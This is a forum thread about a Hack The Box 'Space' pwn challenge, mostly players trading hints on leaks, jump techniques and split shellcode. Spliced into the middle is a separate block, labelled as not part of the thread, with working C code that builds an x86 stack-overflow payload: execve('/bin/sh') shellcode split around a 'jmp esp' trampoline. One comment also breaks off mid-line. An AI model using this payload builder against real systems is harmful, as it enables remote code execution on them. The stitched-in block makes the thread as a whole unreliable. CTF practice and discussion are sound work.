SPACE [PWN]

A New PWN Challenge!

Ja4V8s28Ck
Nothing is an Accident, It's Just a part of Destiny


Comments

  • This is a nice challenge, somewhat similar to ropmev2 it replaced.

    joeblogg801

  • Can I PM someone for a nudge?

    m4nu

    Valiant, nothing is impossible.
    Lock by lock and one after the other is the key. You cannot open door number 9 until you have unlocked number 8.

  • Simple, but interesting...

  • Simple challenge :smile:

  • Hi, I'm stuck and need a little push in the right direction.

    I can redirect the IP to point on the stack but there's not that much 'space'... Any hint would be great.

  • You can send me a PM r4gus! I just completed this challenge and I wouldn't consider my solution as simple, so maybe there is an easier way... but I'm quite new to this, so maybe my judgment of what is easy or not is a bit off... Really enjoyed it though!

    ArtemisFY
    OSCP

  • It's actually not hard tbh

  • @ano12 Can I send you my solution in a PM, to check whether my solution is the intended way?

    ArtemisFY
    OSCP

  • Does anybody try to get root after getting in?

  • edited July 2020

    Spoiler removed

  • Would anyone be up for a PM so I can bat some ideas against them? I think I know where to go with this one, but am stuck.


  • Yes, you can send me a PM @whipped!

    ArtemisFY
    OSCP

  • edited July 2020

    I have a couple of techniques that work against the local binary, but nothing works against the remote server, can't leak anything! Only seg faults remotely, but leaks locally.

    Update: Solved it. It helps to put in the correct PLT addresses in your code. Had the solution days ago, but this simple typo wasted 5 days of debugging...

  • Was anyone able to do this without ropping? Seems it should be doable from looking at the mitigations on the binary

  • @Rembown said:

    Was anyone able to do this without ropping? Seems it should be doable from looking at the mitigations on the binary

    Yes, the intended way was without using rop.

    R4J

  • edited July 2020

    Done with ROP..

    Hack The Box

    Write ups FR : https://hackingdom.io/

  • edited July 2020

    So, I'm new to this and I'm trying to connect to the instance via the docker site but I'm not able to. I've tried docker.hackthebox.eu:(port here) but it doesn't work like the web instance challenges. Tried http:// and https:// with no luck either. I've checked to make sure it isn't being blocked but don't really think I'm able to even start on this one since I can't get to the instance. Any help is appreciated.

  • @Ranger32 said:

    So, I'm new to this and I'm trying to connect to the instance via the docker site but I'm not able to. I've tried docker.hackthebox.eu:(port here) but it doesn't work like the web instance challenges. Tried http:// and https:// with no luck either. I've checked to make sure it isn't being blocked but don't really think I'm able to even start on this one since I can't get to the instance. Any help is appreciated.

    This is a binary exploitation challenge. You're not going to be able to exploit it using a browser... Try researching methods of remote binary exploitation by connecting to the remote instance with netcat (or nc).

    If you are trying to connect to this challenge with a browser, you are likely misinterpreting the meaning of a "pwn" challenge. Best of luck!


    Hack The Box
    defarbs.com | Retired Machine Writeups! - "Let me just quote the late, great Colonel Sanders, who said, 'I'm too drunk... to taste this chicken.'”

  • Can anyone please point me in the right direction? I am having a problem getting a leak.

  • For those who are trying to leak an address, there is no need to do so. Have a look at the binary protections ;-). There is a well-known technique that can be used here to jump to a certain address. For those who, even so, still have troubles with the total bytes available to write a working shellcode, think that you can almost "split" the thing more or less in two halves.

    Cheers, good luck.

    Sociaslkas

  • You can connect to it using netcat.

    The command is

    "nc

    @socialkas said:

    For those who are trying to leak an address, there is no need to do so. Have a look at the binary protections ;-). There is a well-known technique that can be used here to jump to a certain address. For those who, even so, still have troubles with the total bytes available to write a working shellcode, think that you can almost "split" the thing more or less in two halves.

    Cheers, good luck.

    This can become much more complicated. ;) There's another way if you know what to do. I'd say go with the easier side of this.

  • @ano12 said:

    This can become much more complicated. ;) There's another way if you know what to do. I'd say go with the easier side of this.

    But my way is way more fun :)

    Sociaslkas

  • @socialkas said:

    But my way is way more fun :)

    Huh? What do you mean by more fun? A solve is a solve. Splitting the shellcode is just way overkill.
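The hint discussed above (no leak needed once you look at the binary protections, a fixed address to jump to, and shellcode "split in two halves" when the buffer is small) as an added example that is not part of this thread and not the challenge's intended solution. It is a C payload builder for the generic case: an x86 binary with an executable stack and no PIE, a buffer that is too short for the whole shellcode, and a "jmp esp"-style trampoline at a fixed address (the gadget address 0x08040000 and the 32-byte distance to the saved EIP are placeholders, not values from the challenge). The shellcode is the classic Linux x86 execve("/bin/sh") sequence, split after mov ebx, esp; part 1 lives in front of the saved return address, part 2 behind it, and two short jumps stitch them together.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Payload layout, offsets relative to the start of the overflowed buffer:
 *   0 .. buf_to_eip-3   shellcode part 1, NOP-padded
 *   buf_to_eip-2        jmp short +6              ; hop over the EIP slot and the back-jump
 *   buf_to_eip          saved EIP := trampoline   ; assumed "jmp esp"-style gadget
 *   buf_to_eip+4        jmp short -(buf_to_eip+6) ; esp points here after ret: go to part 1
 *   buf_to_eip+6        shellcode part 2
 */
#define OP_NOP       0x90
#define OP_JMP_SHORT 0xEB

/* Displacement for a 2-byte "jmp short" at jmp_at reaching target; 0 on success. */
static int rel8(size_t jmp_at, size_t target, int8_t *out)
{
    long d = (long)target - (long)(jmp_at + 2);   /* relative to the next instruction */
    if (d < -128 || d > 127)
        return -1;
    *out = (int8_t)d;
    return 0;
}

/* Returns the payload length, or 0 if the pieces cannot be laid out. */
size_t build_split_payload(uint8_t *out, size_t cap, size_t buf_to_eip, uint32_t trampoline,
                           const uint8_t *part1, size_t n1, const uint8_t *part2, size_t n2)
{
    size_t total = buf_to_eip + 4 + 2 + n2;
    int8_t back;
    if (buf_to_eip < 2 || n1 + 2 > buf_to_eip || total > cap)
        return 0;                                 /* part 1 + forward jmp must fit */
    if (rel8(buf_to_eip + 4, 0, &back) != 0)
        return 0;                                 /* too far back for a short jmp */
    memset(out, OP_NOP, buf_to_eip - 2);
    memcpy(out, part1, n1);
    out[buf_to_eip - 2] = OP_JMP_SHORT;
    out[buf_to_eip - 1] = 6;                      /* skip 4-byte EIP + 2-byte back-jmp */
    for (int i = 0; i < 4; i++)                   /* little-endian saved EIP */
        out[buf_to_eip + i] = (uint8_t)(trampoline >> (8 * i));
    out[buf_to_eip + 4] = OP_JMP_SHORT;
    out[buf_to_eip + 5] = (uint8_t)back;
    memcpy(out + buf_to_eip + 6, part2, n2);
    return total;
}

/* Check: from offset pc, step over NOPs and follow short jmps; return the first
 * offset holding anything else, i.e. where real shellcode would start executing. */
size_t trace_jumps(const uint8_t *p, size_t len, size_t pc)
{
    for (int steps = 0; steps < 256 && pc < len; steps++) {
        if (p[pc] == OP_NOP)
            pc++;
        else if (p[pc] == OP_JMP_SHORT && pc + 1 < len)
            pc = (size_t)((long)pc + 2 + (int8_t)p[pc + 1]);
        else
            break;
    }
    return pc;
}

/* Classic Linux x86 execve("/bin/sh") sequence, split after "mov ebx, esp". */
static const uint8_t PART1[] = { 0x31, 0xc0, 0x50,                 /* xor eax,eax; push eax */
                                 0x68, 0x2f, 0x2f, 0x73, 0x68,     /* push "//sh" */
                                 0x68, 0x2f, 0x62, 0x69, 0x6e,     /* push "/bin" */
                                 0x89, 0xe3 };                     /* mov ebx, esp */
static const uint8_t PART2[] = { 0x50, 0x53, 0x89, 0xe1,           /* push eax; push ebx; mov ecx,esp */
                                 0xb0, 0x0b, 0xcd, 0x80 };         /* mov al, 11; int 0x80 */

#define BUF_TO_EIP 32u           /* hypothetical distance from buffer to saved EIP */
#define TRAMPOLINE 0x08040000u   /* placeholder, NOT a real gadget address */

uint8_t sample_payload[256];
size_t build_sample(void)
{
    return build_split_payload(sample_payload, sizeof sample_payload, BUF_TO_EIP, TRAMPOLINE,
                               PART1, sizeof PART1, PART2, sizeof PART2);
}

int main(void)
{
    size_t n = build_sample();
    if (n == 0) { fputs("layout does not fit\n", stderr); return 1; }
    /* After "ret" into the trampoline, esp == &buffer[BUF_TO_EIP + 4]. */
    printf("%zu bytes; jmp esp lands at +%u, runs part 1 from +%zu, then part 2 from +%zu\n",
           n, BUF_TO_EIP + 4, trace_jumps(sample_payload, n, BUF_TO_EIP + 4),
           trace_jumps(sample_payload, n, sizeof PART1));
    for (size_t i = 0; i < n; i++)
        printf("%02x%s", sample_payload[i], (i + 1) % 16 == 0 || i + 1 == n ? "\n" : " ");
    return 0;
}
```

The back-jump is the constraint to watch: a short jmp only reaches 128 bytes backwards, so this layout works for buffers up to 122 bytes before the saved EIP; larger buffers would need a near jmp (E9 plus a 32-bit displacement) after the return address instead. The check function only follows NOPs and short jumps, which is enough to confirm the stitching before sending anything to the remote service.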

  • Would anybody be able to help me out a bit here? My shellcode works fine locally, but not on the remote service, and I have no clue what could be going wrong. Hate it when this happens...

  • edited August 2020

    @Chainmanner said:

    Would anybody be able to help me out a bit here? My shellcode works fine locally, but not on the remote service, and I have no clue what could be going wrong. Hate it when this happens...

    There are multiple ways to solve this one; you need to explain more about what you have done.
    It can be the execution environment, for example, or something else.

    'These violent delights have violent ends'

  • @Chainmanner said:

    Would anybody be able to help me out a bit here? My shellcode works fine locally, but not on the remote service, and I have no clue what could be going wrong. Hate it when this happens...

    This mainly happens due to some type of stack misalignment error, at least from what I have faced in the past. But nothing much can be said without looking at the payload that you're sending.

  • Hi, I'm stuck. I can rewrite $eip to any value, but it doesn't give much result.
    I can't use ret2libc, because I don't know the libc address.
    Maybe I should focus on the PLT and GOT sections. I need a hint.
    Tell me what strategy I should follow,
    or write to me in HP with a more detailed explanation.

    thank you in advance!

  • Hi, I'm currently stuck. I do have some kind of control of EIP, but the various things I tried either only work locally or don't work at all. Could someone please give me a hint on how to proceed, or PM me for more details.
    Thanks

    zaphoxx

  • Not "Very easy" but fun :)
